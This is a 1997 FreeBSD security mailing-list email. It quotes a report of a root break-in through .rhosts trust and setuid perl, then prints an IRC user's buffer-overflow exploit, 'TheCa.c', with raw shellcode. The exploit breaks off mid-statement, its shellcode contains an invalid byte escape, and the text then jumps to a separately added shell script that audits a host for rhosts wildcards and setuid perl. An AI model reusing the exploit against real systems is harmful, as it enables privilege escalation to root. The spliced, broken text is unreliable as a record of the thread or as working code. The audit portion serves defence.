From owner-freebsd-security Wed Jul 30 11:39:53 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA23382 for security-outgoing; Wed, 30 Jul 1997 11:39:53 -0700 (PDT)
Received: from bizet.videotron.net (bizet.videotron.net [205.151.222.75]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA23376 for ; Wed, 30 Jul 1997 11:39:50 -0700 (PDT)
Received: from gvl-07851 (poste221.vl.videotron.net [206.231.222.221]) by bizet.videotron.net (8.8.5/8.8.2) with SMTP id OAA09501 for ; Wed, 30 Jul 1997 14:39:10 -0400 (EDT)
Message-Id: <3.0.2.32.19970730144402.006c5dd4@pop.videotron.ca>
X-Sender: gilbertp@pop.videotron.ca
X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.2 (32)
Date: Wed, 30 Jul 1997 14:44:02 -0400
To: security@FreeBSD.ORG
From: Patrick Gilbert
Subject: Re: security hole in FreeBSD
In-Reply-To:
References:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

At 17:27 97-07-28 -0700, you wrote:
> Just an update on how the break-in was done after the hacker was
> confronted on irc.
>
> Apparently FreeBSD ships with .rhosts in the root account. Using
> this and perl5.00401, the user was able to rlogin onto the other machine
> without using a password.

After a brief discussion with TheCa on Efnet, he dcc'd me his famous
exploit for a transcript of his brief moment of fame on this discussion list.
/* TheCa.c - eleet buffer exploit which looks a lot like the 4.0xx sperl exploit by Ovx */

#include
#include
#include

#define BUFFER_SIZE 1400
#define OFFSET 600

char *get_esp(void)
{
    asm("movl %esp,%eax");
}

char buf[BUFFER_SIZE];

main(int argc, char *argv[])
{
    int i;
    char execshell[] =
        "\xeb\x23\x5e\x8d\x1f\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
        "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
        "\x51\x53\x50\xeb\x18\xer\xd8\xff\xff\xff/bin/id\x01\x01\x01\x01"
        "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

    for(i=0+1;i
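The quoted report turns on two conditions coming together: a trust file in the root account that lets rlogin in without a password, and a setuid perl interpreter on the box. The following sh script is an added audit example, written here for this archive page and not part of the thread or of FreeBSD; it flags both conditions so an administrator can check a host before an exploit like the one above is ever needed. The default paths (/root/.rhosts, /usr/bin, /usr/local/bin) and the interpreter name patterns sperl*/suidperl* are assumptions about how the files are laid out, not facts stated in the mail.

```shell
#!/bin/sh
# Added audit helper (example code, not from the mailing-list thread).
# Flags the two conditions the quoted break-in report combines:
#   1. an rhosts-style trust file granting password-less rlogin, and
#   2. a setuid perl interpreter (named sperl* / suidperl* by assumption).

# rhosts_trust_lines FILE
# Prints every active line of an rhosts/hosts.equiv file, skipping comments
# and blank lines. Lines containing the '+' wildcard ("any host" / "any user")
# are prefixed WILDCARD:, all other trust entries TRUST:.
rhosts_trust_lines() {
    file="$1"
    [ -r "$file" ] || return 1
    grep -v '^[[:space:]]*#' "$file" | grep -v '^[[:space:]]*$' |
    while IFS= read -r line; do
        case "$line" in
            *+*) printf 'WILDCARD: %s\n' "$line" ;;
            *)   printf 'TRUST:    %s\n' "$line" ;;
        esac
    done
}

# count_rhosts_wildcards FILE -> number of '+' entries (the dangerous ones)
count_rhosts_wildcards() {
    rhosts_trust_lines "$1" | grep -c '^WILDCARD:' || true
}

# count_rhosts_entries FILE -> number of active trust lines of any kind
count_rhosts_entries() {
    rhosts_trust_lines "$1" | grep -c . || true
}

# find_setuid_perl DIR... -> regular files with the setuid bit whose name
# matches an assumed suid-perl build name
find_setuid_perl() {
    find "$@" -type f -perm -4000 \( -name 'sperl*' -o -name 'suidperl*' \) 2>/dev/null
}

# audit_host [RHOSTS_FILE] [BINDIR...] -> one summary line per finding.
# Defaults (assumed layout): /root/.rhosts, /usr/bin and /usr/local/bin.
audit_host() {
    rhosts="${1:-/root/.rhosts}"
    if [ $# -gt 0 ]; then shift; fi
    if [ $# -eq 0 ]; then set -- /usr/bin /usr/local/bin; fi
    if [ -r "$rhosts" ]; then
        printf '%s: %s trust entries, %s wildcard\n' "$rhosts" \
            "$(count_rhosts_entries "$rhosts")" \
            "$(count_rhosts_wildcards "$rhosts")"
    fi
    find_setuid_perl "$@" | while IFS= read -r f; do
        printf 'setuid perl present: %s\n' "$f"
    done
}

# Usage (source the file, then call):  . ./audit.sh; audit_host /root/.rhosts /usr/bin
```

Run it against /etc/hosts.equiv as well as root's .rhosts, since either file opens the same rlogin path; any WILDCARD line, or any setuid perl hit, is a finding worth removing rather than merely logging.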